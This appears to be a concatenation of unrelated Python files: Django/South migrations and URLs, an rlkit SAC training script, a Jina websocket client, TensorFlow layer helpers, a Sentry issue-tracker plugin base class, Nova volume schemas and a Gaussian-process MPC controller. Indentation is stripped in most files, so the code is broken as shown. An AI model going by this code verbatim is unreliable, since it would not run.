self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Enquiry.is_published'
db.delete_column('enquiry_enquiry', 'is_published')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.answer': {
'Meta': {'object_name': 'Answer'},
'enquiry': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'answers'", 'to': "orm['enquiry.Enquiry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'enquiry.answertrans': {
'Meta': {'object_name': 'AnswerTrans'},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['enquiry.Answer']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.enquiry': {
'Meta': {'object_name': 'Enquiry'},
'allow_anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'enquiries'", 'null': 'True', 'to': "orm['auth.User']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 10, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 10, 16, 0, 0)'})
},
'enquiry.enquirytrans': {
'Meta': {'object_name': 'EnquiryTrans'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'enquiry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['enquiry.Enquiry']"}),
'extra_info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'enquiry.vote': {
'Meta': {'object_name': 'Vote'},
'answer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['enquiry.Answer']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'votes'", 'null': 'True', 'to': "orm['auth.User']"})
}
}
complete_apps = ['enquiry']
|
from gym.envs.mujoco import HalfCheetahEnv
import rlkit.torch.pytorch_util as ptu
from rlkit.data_management.env_replay_buffer import EnvReplayBuffer
from rlkit.envs.wrappers import NormalizedBoxEnv
from rlkit.launchers.launcher_util import setup_logger
from rlkit.samplers.data_collector import MdpPathCollector
from rlkit.torch.sac.policies import TanhGaussianPolicy, MakeDeterministic
from rlkit.torch.sac.sac import SACTrainer
from rlkit.torch.networks import FlattenMlp
from rlkit.torch.torch_rl_algorithm import TorchBatchRLAlgorithm
def experiment(variant):
expl_env = NormalizedBoxEnv(HalfCheetahEnv())
eval_env = NormalizedBoxEnv(HalfCheetahEnv())
obs_dim = expl_env.observation_space.low.size
action_dim = eval_env.action_space.low.size
M = variant['layer_size']
qf1 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
qf2 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
target_qf1 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
target_qf2 = FlattenMlp(
input_size=obs_dim + action_dim,
output_size=1,
hidden_sizes=[M, M],
)
policy = TanhGaussianPolicy(
obs_dim=obs_dim,
action_dim=action_dim,
hidden_sizes=[M, M],
)
eval_policy = MakeDeterministic(policy)
eval_path_collector = MdpPathCollector(
eval_env,
eval_policy,
)
expl_path_collector = MdpPathCollector(
expl_env,
policy,
)
replay_buffer = EnvReplayBuffer(
variant['replay_buffer_size'],
expl_env,
)
trainer = SACTrainer(
env=eval_env,
policy=policy,
qf1=qf1,
qf2=qf2,
target_qf1=target_qf1,
target_qf2=target_qf2,
**variant['trainer_kwargs']
)
algorithm = TorchBatchRLAlgorithm(
trainer=trainer,
exploration_env=expl_env,
evaluation_env=eval_env,
exploration_data_collector=expl_path_collector,
evaluation_data_collector=eval_path_collector,
replay_buffer=replay_buffer,
**variant['algorithm_kwargs']
)
algorithm.to(ptu.device)
algorithm.train(start_epoch=0)
if __name__ == "__main__":
# parser = argparse.ArgumentParser()
# parser.add_argument('--initial_epoch', action='store_true')
# args = parser.parse_args()
# noinspection PyTypeChecker
variant = dict(
algorithm="SAC",
version="normal",
layer_size=256,
replay_buffer_size=int(1E6),
algorithm_kwargs=dict(
num_epochs=3000,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=1000,
min_num_steps_before_training=1000,
max_path_length=1000,
batch_size=256,
initial_epoch=None
),
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
use_automatic_entropy_tuning=True
),
)
setup_logger('name-of-experiment', variant=variant)
ptu.set_gpu_mode(True) # optionally set the GPU (default=False)
experiment(variant)
|
def reverseLists(list1) :
"""
原地用递归的方法反转list
:param list1:
:return:
"""
    def helper(list1, left, right):
        if left < right:
            list1[left], list1[right] = list1[right], list1[left]
            helper(list1, left + 1, right - 1)
    helper(list1, 0, len(list1) - 1)
if __name__ == "__main__" :
list1 = ["a", "b", "c" , "d" , "d","e"]
reverseLists(list1)
print()
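    # Quick check (added for illustration): the reversal happened in place.
    assert list1 == ["e", "d", "d", "c", "b", "a"]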
|
"""A module for the websockets-based Client for Jina."""
from typing import Callable, Optional
from contextlib import nullcontext, AsyncExitStack
from ..helper import callback_exec
from .helper import WebsocketClientlet
from ...importer import ImportExtensions
from ..base import BaseClient, InputType
from ...logging.profile import ProgressBar
from ...peapods.stream.client import WebsocketClientStreamer
class WebSocketBaseClient(BaseClient):
"""A Websocket Client."""
async def _get_results(
self,
inputs: InputType,
on_done: Callable,
on_error: Optional[Callable] = None,
on_always: Optional[Callable] = None,
**kwargs,
):
"""
:param inputs: the callable
:param on_done: the callback for on_done
:param on_error: the callback for on_error
:param on_always: the callback for on_always
:param kwargs: kwargs for _get_task_name and _get_requests
:yields: generator over results
"""
with ImportExtensions(required=True):
import aiohttp
self.inputs = inputs
request_iterator = self._get_requests(**kwargs)
async with AsyncExitStack() as stack:
try:
cm1 = (
ProgressBar(total_length=self._inputs_length)
if self.show_progress
else nullcontext()
)
p_bar = stack.enter_context(cm1)
proto = 'wss' if self.args.https else 'ws'
url = f'{proto}://{self.args.host}:{self.args.port}/'
iolet = await stack.enter_async_context(
WebsocketClientlet(url=url, logger=self.logger)
)
streamer = WebsocketClientStreamer(self.args, iolet=iolet)
async for response in streamer.stream(request_iterator):
callback_exec(
response=response,
on_error=on_error,
on_done=on_done,
on_always=on_always,
continue_on_error=self.continue_on_error,
logger=self.logger,
)
if self.show_progress:
p_bar.update()
yield response
except aiohttp.ClientError as e:
self.logger.error(
f'Error while streaming response from websocket server {e!r}'
)
|
import pickle
pranjal = {
'first_name': 'Pranjal',
'last_name': 'Patra',
'age': 35,
'NetWorth': 420.69,
'Vaccinated': True
}
with open("pranjal.bin", 'wb') as pranjal_file:
pickle.dump(pranjal, pranjal_file)
with open('pranjal.bin', 'rb') as pranjal_file:
pranjal_from_bin_file = pickle.load(pranjal_file)
print(pranjal_from_bin_file)
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import include
urlpatterns = [
path('admin/', admin.site.urls),
path('kumarmayank', include('home.urls')),
]
|
# -*- coding: utf-8 -*-
# --------------------------------------
# @Time : 2020/11/01
# @Author : Oscar Chen
# @Email : 530824679@qq.com
# @File : ops.py
# Description :base operators.
# --------------------------------------
import tensorflow as tf
def leaky_relu(x):
return tf.nn.leaky_relu(x, alpha=0.1, name='leaky_relu')
def conv2d(inputs, filters_num, filters_size, pad_size=0, stride=1, batch_normalize=True, activation=leaky_relu, use_bias=False, is_train=True, name='conv2d'):
if pad_size > 0:
inputs = tf.pad(inputs, [[0,0], [pad_size, pad_size], [pad_size, pad_size],[0,0]])
out = tf.layers.conv2d(inputs, filters=filters_num, kernel_size=filters_size, strides=stride, padding='VALID', activation=None, use_bias=use_bias, name=name)
if batch_normalize:
out = tf.layers.batch_normalization(out, axis=-1, momentum=0.9, training=is_train, name=name+'_bn')
if activation:
out = activation(out)
return out
def maxpool(inputs, size=2, stride=2, name='maxpool'):
with tf.name_scope(name):
out = tf.layers.max_pooling2d(inputs, pool_size=size, strides=stride, padding='SAME')
return out
def reorg(inputs, stride):
return tf.space_to_depth(inputs, block_size=stride)
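if __name__ == '__main__':
    # Minimal usage sketch (added for illustration; the input size and hyper-parameters
    # are made up): build a conv -> maxpool -> reorg stack with the TF1-style layers above.
    inputs = tf.placeholder(tf.float32, [None, 416, 416, 3], name='inputs')
    net = conv2d(inputs, filters_num=32, filters_size=3, pad_size=1, name='conv1')
    net = maxpool(net, size=2, stride=2, name='pool1')
    net = reorg(net, stride=2)
    print(net.get_shape())  # expected: (?, 104, 104, 128)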
|
from __future__ import absolute_import
import six
from rest_framework.response import Response
from social_auth.models import UserSocialAuth
from django.conf import settings
from django.conf.urls import url
from django.core.urlresolvers import reverse
from django.utils.html import format_html
from sentry.api.serializers.models.plugin import PluginSerializer
# api compat
from sentry.exceptions import PluginError # NOQA
from sentry.models import Activity, Event, GroupMeta
from sentry.plugins import Plugin
from sentry.plugins.base.configuration import react_plugin_config
from sentry.plugins.endpoints import PluginGroupEndpoint
from sentry.signals import issue_tracker_used
from sentry.utils.auth import get_auth_providers
from sentry.utils.http import absolute_uri
from sentry.utils.safe import safe_execute
# TODO(dcramer): remove this in favor of GroupEndpoint
class IssueGroupActionEndpoint(PluginGroupEndpoint):
view_method_name = None
plugin = None
def _handle(self, request, group, *args, **kwargs):
GroupMeta.objects.populate_cache([group])
return getattr(self.plugin, self.view_method_name)(request, group, *args, **kwargs)
class IssueTrackingPlugin2(Plugin):
auth_provider = None
allowed_actions = ('create', 'link', 'unlink')
# we default this to None to support legacy integrations, but newer style
# should explicitly call out what is stored
issue_fields = None
# issue_fields = frozenset(['id', 'title', 'url'])
def configure(self, project, request):
return react_plugin_config(self, project, request)
def get_plugin_type(self):
return 'issue-tracking'
def has_project_conf(self):
return True
def get_group_body(self, request, group, event, **kwargs):
result = []
for interface in six.itervalues(event.interfaces):
output = safe_execute(interface.to_string, event, _with_transaction=False)
if output:
result.append(output)
return '\n\n'.join(result)
def get_group_description(self, request, group, event):
output = [
absolute_uri(group.get_absolute_url()),
]
body = self.get_group_body(request, group, event)
if body:
output.extend([
'',
'```',
body,
'```',
])
return '\n'.join(output)
def get_group_title(self, request, group, event):
return event.error()
def is_configured(self, request, project, **kwargs):
raise NotImplementedError
def get_group_urls(self):
_urls = []
for action in self.allowed_actions:
view_method_name = 'view_%s' % action
_urls.append(
url(
r'^%s/' % action,
PluginGroupEndpoint.as_view(
view=getattr(self, view_method_name),
),
)
)
return _urls
def get_auth_for_user(self, user, **kwargs):
"""
        Return a ``UserSocialAuth`` object for the given user based on this plugin's ``auth_provider``.
"""
assert self.auth_provider, 'There is no auth provider configured for this plugin.'
if not user.is_authenticated():
return None
try:
return UserSocialAuth.objects.filter(user=user, provider=self.auth_provider)[0]
except IndexError:
return None
def needs_auth(self, request, project, **kwargs):
"""
Return ``True`` if the authenticated user needs to associate an auth service before
performing actions with this plugin.
"""
if self.auth_provider is None:
return False
if not request.user.is_authenticated():
return True
return not UserSocialAuth.objects.filter(
user=request.user, provider=self.auth_provider
).exists()
def get_new_issue_fields(self, request, group, event, **kwargs):
"""
If overriding, supported properties include 'readonly': true
"""
return [
{
'name': 'title',
'label': 'Title',
'default': self.get_group_title(request, group, event),
'type': 'text'
}, {
'name': 'description',
'label': 'Description',
'default': self.get_group_description(request, group, event),
'type': 'textarea'
}
]
def get_link_existing_issue_fields(self, request, group, event, **kwargs):
return []
def _get_issue_url_compat(self, group, issue, **kwargs):
if self.issue_fields is None:
return self.get_issue_url(group, issue['id'])
return self.get_issue_url(group, issue)
def _get_issue_label_compat(self, group, issue, **kwargs):
if self.issue_fields is None:
return self.get_issue_label(group, issue['id'])
return self.get_issue_label(group, issue)
def get_issue_url(self, group, issue, **kwargs):
"""
Given an issue context (issue_id string or issue dict) return an absolute URL to the issue's details
page.
"""
raise NotImplementedError
def get_issue_label(self, group, issue, **kwargs):
"""
Given an issue context (issue_id string or issue dict) return a string representing the issue.
e.g. GitHub represents issues as GH-XXX
"""
if isinstance(issue, dict):
return u'#{}'.format(issue['id'])
return u'#{}'.format(issue)
def create_issue(self, request, group, form_data, **kwargs):
"""
Creates the issue on the remote service and returns an issue ID.
Returns ``{'id': '1', 'title': issue_title}``
"""
raise NotImplementedError
def link_issue(self, request, group, form_data, **kwargs):
"""
Can be overridden for any actions needed when linking issues
(like adding a comment to an existing issue).
Returns ``{'id': '1', 'title': issue_title}``
"""
pass
def has_auth_configured(self, **kwargs):
if not self.auth_provider:
return True
return self.auth_provider in get_auth_providers()
def validate_form(self, fields, form_data):
errors = {}
for field in fields:
if field.get('required', True) and not field.get('readonly'):
value = form_data.get(field['name'])
if value is None or value == '':
errors[field['name']] = u'%s is a required field.' % field['label']
return errors
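    # Example (illustrative): with fields = [{'name': 'title', 'label': 'Title'}] and
    # form_data = {'title': ''}, validate_form returns
    # {'title': u'Title is a required field.'}, since fields are required by default
    # unless marked readonly or required=False.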
def get_issue_field_map(self):
# XXX(dcramer): legacy support
conf_key = self.get_conf_key()
if self.issue_fields is None:
return {
'id': u'{}:tid'.format(conf_key)
}
return {
key: u'{}:issue_{}'.format(
conf_key,
key,
)
for key in self.issue_fields
}
def build_issue(self, group):
issue_field_map = self.get_issue_field_map()
issue = {}
for key, meta_name in six.iteritems(issue_field_map):
issue[key] = GroupMeta.objects.get_value(group, meta_name, None)
if not any(issue.values()):
return None
return issue
def has_linked_issue(self, group):
return bool(self.build_issue(group))
def unlink_issue(self, request, group, issue, **kwargs):
issue_field_map = self.get_issue_field_map()
for meta_name in six.itervalues(issue_field_map):
GroupMeta.objects.unset_value(group, meta_name)
return self.redirect(group.get_absolute_url())
def view_create(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
event = group.get_latest_event()
if event is None:
return Response({
'message': 'Unable to create issues: there are '
'no events associated with this group',
}, status=400)
Event.objects.bind_nodes([event], 'data')
try:
fields = self.get_new_issue_fields(request, group, event, **kwargs)
except Exception as e:
return self.handle_api_error(e)
if request.method == 'GET':
return Response(fields)
errors = self.validate_form(fields, request.DATA)
if errors:
return Response({'error_type': 'validation', 'errors': errors}, status=400)
try:
issue = self.create_issue(
group=group,
form_data=request.DATA,
request=request,
)
except Exception as e:
return self.handle_api_error(e)
if not isinstance(issue, dict):
issue = {'id': issue}
issue_field_map = self.get_issue_field_map()
for key, meta_name in six.iteritems(issue_field_map):
if key in issue:
GroupMeta.objects.set_value(group, meta_name, issue[key])
else:
GroupMeta.objects.unset_value(group, meta_name)
issue_information = {
'title': issue.get('title') or request.DATA.get('title') or self._get_issue_label_compat(group, issue),
'provider': self.get_title(),
'location': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
Activity.objects.create(
project=group.project,
group=group,
type=Activity.CREATE_ISSUE,
user=request.user,
data=issue_information,
)
issue_tracker_used.send_robust(
plugin=self, project=group.project, user=request.user,
sender=type(self)
)
return Response({'issue_url': self.get_issue_url(group, issue),
'link': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
'id': issue['id']})
def view_link(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
event = group.get_latest_event()
if event is None:
return Response({
                'message': 'Unable to link issues: there are '
'no events associated with this group',
}, status=400)
Event.objects.bind_nodes([event], 'data')
try:
fields = self.get_link_existing_issue_fields(request, group, event, **kwargs)
except Exception as e:
return self.handle_api_error(e)
if request.method == 'GET':
return Response(fields)
errors = self.validate_form(fields, request.DATA)
if errors:
return Response({'error_type': 'validation', 'errors': errors}, status=400)
try:
issue = self.link_issue(
group=group,
form_data=request.DATA,
request=request,
) or {}
except Exception as e:
return self.handle_api_error(e)
# HACK(dcramer): maintain data for legacy issues
if 'id' not in issue and 'issue_id' in request.DATA:
issue['id'] = request.DATA['issue_id']
issue_field_map = self.get_issue_field_map()
for key, meta_name in six.iteritems(issue_field_map):
if key in issue:
GroupMeta.objects.set_value(group, meta_name, issue[key])
else:
GroupMeta.objects.unset_value(group, meta_name)
issue_information = {
'title': issue.get('title') or self._get_issue_label_compat(group, issue),
'provider': self.get_title(),
'location': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
Activity.objects.create(
project=group.project,
group=group,
type=Activity.CREATE_ISSUE,
user=request.user,
data=issue_information,
)
return Response({'message': 'Successfully linked issue.',
'link': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
'id': issue['id']})
def view_unlink(self, request, group, **kwargs):
auth_errors = self.check_config_and_auth(request, group)
if auth_errors:
return Response(auth_errors, status=400)
issue = self.build_issue(group)
if issue and 'unlink' in self.allowed_actions:
self.unlink_issue(request, group, issue)
return Response({'message': 'Successfully unlinked issue.'})
return Response({'message': 'No issues to unlink.'}, status=400)
def plugin_issues(self, request, group, plugin_issues, **kwargs):
if not self.is_configured(request=request, project=group.project):
return plugin_issues
item = {
'slug': self.slug,
'allowed_actions': self.allowed_actions,
'title': self.get_title()
}
issue = self.build_issue(group)
if issue:
item['issue'] = {
'issue_id': issue.get('id'),
'url': self._get_issue_url_compat(group, issue),
'label': self._get_issue_label_compat(group, issue),
}
item.update(PluginSerializer(group.project).serialize(self, None, request.user))
plugin_issues.append(item)
return plugin_issues
def get_config(self, *args, **kwargs):
# TODO(dcramer): update existing plugins to just use get_config
# TODO(dcramer): remove request kwarg after sentry-plugins has been
# updated
kwargs.setdefault('request', None)
return self.get_configure_plugin_fields(*args, **kwargs)
def check_config_and_auth(self, request, group):
has_auth_configured = self.has_auth_configured()
if not (has_auth_configured and self.is_configured(
project=group.project, request=request)):
if self.auth_provider:
required_auth_settings = settings.AUTH_PROVIDERS[self.auth_provider]
else:
required_auth_settings = None
return {
'error_type': 'config',
'has_auth_configured': has_auth_configured,
'auth_provider': self.auth_provider,
'required_auth_settings': required_auth_settings,
}
if self.needs_auth(project=group.project, request=request):
return {
'error_type': 'auth',
'auth_url': reverse('socialauth_associate', args=[self.auth_provider])
}
# TODO: should we get rid of this (move it to react?)
def tags(self, request, group, tag_list, **kwargs):
if not self.is_configured(request=request, project=group.project):
return tag_list
issue = self.build_issue(group)
if not issue:
return tag_list
tag_list.append(
format_html(
'<a href="{}">{}</a>',
self._get_issue_url_compat(group, issue),
self._get_issue_label_compat(group, issue),
)
)
return tag_list
IssuePlugin2 = IssueTrackingPlugin2
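# --- Illustrative sketch (not part of Sentry itself) ---
# A minimal example of how a concrete tracker might subclass IssueTrackingPlugin2.
# The tracker name, URL scheme and returned ids are hypothetical; a real plugin
# would also declare configuration fields and call the remote service's API
# inside create_issue()/link_issue().
class ExampleIssuePlugin(IssueTrackingPlugin2):
    slug = 'example-tracker'
    title = 'Example Tracker'
    issue_fields = frozenset(['id', 'title'])

    def get_issue_url(self, group, issue, **kwargs):
        # Hypothetical issue URL scheme.
        return 'https://tracker.example.com/issues/%s' % issue['id']

    def get_issue_label(self, group, issue, **kwargs):
        return u'EX-{}'.format(issue['id'])

    def create_issue(self, request, group, form_data, **kwargs):
        # A real implementation would POST form_data to the tracker here.
        return {'id': '1', 'title': form_data.get('title')}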
|
# Copyright 2014 IBM Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from nova.api.validation import parameter_types
create = {
'type': 'object',
'properties': {
'volume': {
'type': 'object',
'properties': {
'volume_type': {'type': 'string'},
'metadata': {'type': 'object'},
'snapshot_id': {'type': 'string'},
'size': {
'type': ['integer', 'string'],
'pattern': '^[0-9]+$',
'minimum': 1
},
'availability_zone': {'type': 'string'},
'display_name': {'type': 'string'},
'display_description': {'type': 'string'},
},
'required': ['size'],
'additionalProperties': False,
},
},
'required': ['volume'],
'additionalProperties': False,
}
snapshot_create = {
'type': 'object',
'properties': {
'snapshot': {
'type': 'object',
'properties': {
'volume_id': {'type': 'string'},
'force': parameter_types.boolean,
'display_name': {'type': 'string'},
'display_description': {'type': 'string'},
},
'required': ['volume_id'],
'additionalProperties': False,
},
},
'required': ['snapshot'],
'additionalProperties': False,
}
create_volume_attachment = {
'type': 'object',
'properties': {
'volumeAttachment': {
'type': 'object',
'properties': {
'volumeId': parameter_types.volume_id,
'device': {
'type': ['string', 'null'],
# NOTE: The validation pattern from match_device() in
# nova/block_device.py.
'pattern': '(^/dev/x{0,1}[a-z]{0,1}d{0,1})([a-z]+)[0-9]*$'
}
},
'required': ['volumeId'],
'additionalProperties': False,
},
},
'required': ['volumeAttachment'],
'additionalProperties': False,
}
update_volume_attachment = copy.deepcopy(create_volume_attachment)
del update_volume_attachment['properties']['volumeAttachment'][
'properties']['device']
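# --- Hedged illustration (not part of the original Nova module) ---
# The dicts above are plain JSON Schema documents, so a request body can be
# checked directly with the third-party ``jsonschema`` package; Nova's own
# api.validation layer wraps this differently. Sketch only:
if __name__ == '__main__':
    import jsonschema
    body = {'volume': {'size': 1, 'display_name': 'scratch'}}
    jsonschema.validate(body, create)  # accepted: 'size' present and >= 1
    try:
        jsonschema.validate({'volume': {}}, create)
    except jsonschema.ValidationError:
        pass  # rejected: 'size' is required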
|
"""Model Predictive Control with a Gaussian Process model.
Based on:
* L. Hewing, J. Kabzan and M. N. Zeilinger, "Cautious Model Predictive Control Using Gaussian Process Regression,"
in IEEE Transactions on Control Systems Technology, vol. 28, no. 6, pp. 2736-2743, Nov. 2020, doi: 10.1109/TCST.2019.2949757.
Implementation details:
1. The previous time step MPC solution is used to compute the set constraints and GP dynamics rollout.
       Here, the dynamics are rolled out using the Mean Equivalence method, the fastest but least accurate option.
2. The GP is approximated using the Fully Independent Training Conditional (FITC) outlined in
* J. Quinonero-Candela, C. E. Rasmussen, and R. Herbrich, “A unifying view of sparse approximate Gaussian process regression,”
Journal of Machine Learning Research, vol. 6, pp. 1935–1959, 2005.
https://www.jmlr.org/papers/volume6/quinonero-candela05a/quinonero-candela05a.pdf
* E. Snelson and Z. Ghahramani, “Sparse gaussian processes using pseudo-inputs,” in Advances in Neural Information Processing
Systems, Y. Weiss, B. Scholkopf, and J. C. Platt, Eds., 2006, pp. 1257–1264.
and the inducing points are the previous MPC solution.
3. Each dimension of the learned error dynamics is an independent Zero Mean SE Kernel GP.
"""
import scipy.linalg
import scipy.stats
import numpy as np
import casadi as cs
import time
import torch
import gpytorch
from copy import deepcopy
from skopt.sampler import Lhs
from functools import partial
from sklearn.model_selection import train_test_split
from safe_control_gym.controllers.mpc.linear_mpc import LinearMPC, MPC
from safe_control_gym.controllers.mpc.mpc_utils import discretize_linear_system
from safe_control_gym.controllers.mpc.gp_utils import GaussianProcessCollection, ZeroMeanIndependentGPModel, covSEard
from safe_control_gym.envs.benchmark_env import Task
class GPMPC(MPC):
"""MPC with Gaussian Process as dynamics residual.
"""
def __init__(
self,
env_func,
seed: int = 1337,
horizon: int = 5,
q_mpc: list = [1],
r_mpc: list = [1],
additional_constraints: list = None,
use_prev_start: bool = True,
train_iterations: int = 800,
validation_iterations: int = 200,
optimization_iterations: list = None,
learning_rate: list = None,
normalize_training_data: bool = False,
use_gpu: bool = False,
gp_model_path: str = None,
prob: float = 0.955,
initial_rollout_std: float = 0.005,
input_mask: list = None,
target_mask: list = None,
gp_approx: str = 'mean_eq',
sparse_gp: bool = False,
online_learning: bool = False,
inertial_prop: list = [1.0],
prior_param_coeff: float = 1.0,
output_dir: str = "results/temp",
**kwargs
):
"""Initialize GP-MPC.
Args:
env_func (gym.Env): functionalized initialization of the environment.
seed (int): random seed.
horizon (int): MPC planning horizon.
            q_mpc, r_mpc (list): diagonal entries of the state and input cost weight matrices.
use_prev_start (bool): Warmstart mpc with the previous solution.
train_iterations (int): the number of training examples to use for each dimension of the GP.
            validation_iterations (int): the number of points to use for the test set during training.
optimization_iterations (list): the number of optimization iterations for each dimension of the GP.
learning_rate (list): the learning rate for training each dimension of the GP.
normalize_training_data (bool): Normalize the training data.
use_gpu (bool): use GPU while training the gp.
gp_model_path (str): path to a pretrained GP model. If None, will train a new one.
output_dir (str): directory to store model and results.
prob (float): desired probabilistic safety level.
initial_rollout_std (float): the initial std (across all states) for the mean_eq rollout.
inertial_prop (list): to initialize the inertial properties of the prior model.
            prior_param_coeff (float): constant multiplying factor to adjust the prior model inertial properties.
input_mask (list): list of which input dimensions to use in GP model. If None, all are used.
target_mask (list): list of which output dimensions to use in the GP model. If None, all are used.
            gp_approx (str): 'mean_eq' uses the mean equivalence rollout for the GP dynamics; currently the only option that works.
online_learning (bool): if true, GP kernel values will be updated using past trajectory values.
additional_constraints (list): list of Constraint objects defining additional constraints to be used.
"""
print("############################################### GP-MPC hexa ###########################################")
self.prior_env_func = partial(env_func,
inertial_prop=np.array(inertial_prop)*prior_param_coeff)
self.prior_param_coeff = prior_param_coeff
# Initialize the method using linear MPC.
self.prior_ctrl = LinearMPC(
self.prior_env_func,
horizon=horizon,
q_mpc=q_mpc,
r_mpc=r_mpc,
use_prev_start=use_prev_start,
output_dir=output_dir,
additional_constraints=additional_constraints,
)
self.prior_ctrl.reset()
super().__init__(
self.prior_env_func,
horizon=horizon,
q_mpc=q_mpc,
r_mpc=r_mpc,
use_prev_start=use_prev_start,
output_dir=output_dir,
additional_constraints=additional_constraints,
**kwargs)
# Setup environments.
self.env_func = env_func
self.env = env_func(randomized_init=False)
self.env_training = env_func(randomized_init=True)
# No training data accumulated yet so keep the dynamics function as linear prior.
self.train_data = None
self.prior_dynamics_func = self.prior_ctrl.linear_dynamics_func
# GP and training parameters.
self.gaussian_process = None
self.train_iterations = train_iterations
self.validation_iterations = validation_iterations
self.optimization_iterations = optimization_iterations
self.learning_rate = learning_rate
self.gp_model_path = gp_model_path
self.normalize_training_data = normalize_training_data
self.use_gpu = use_gpu
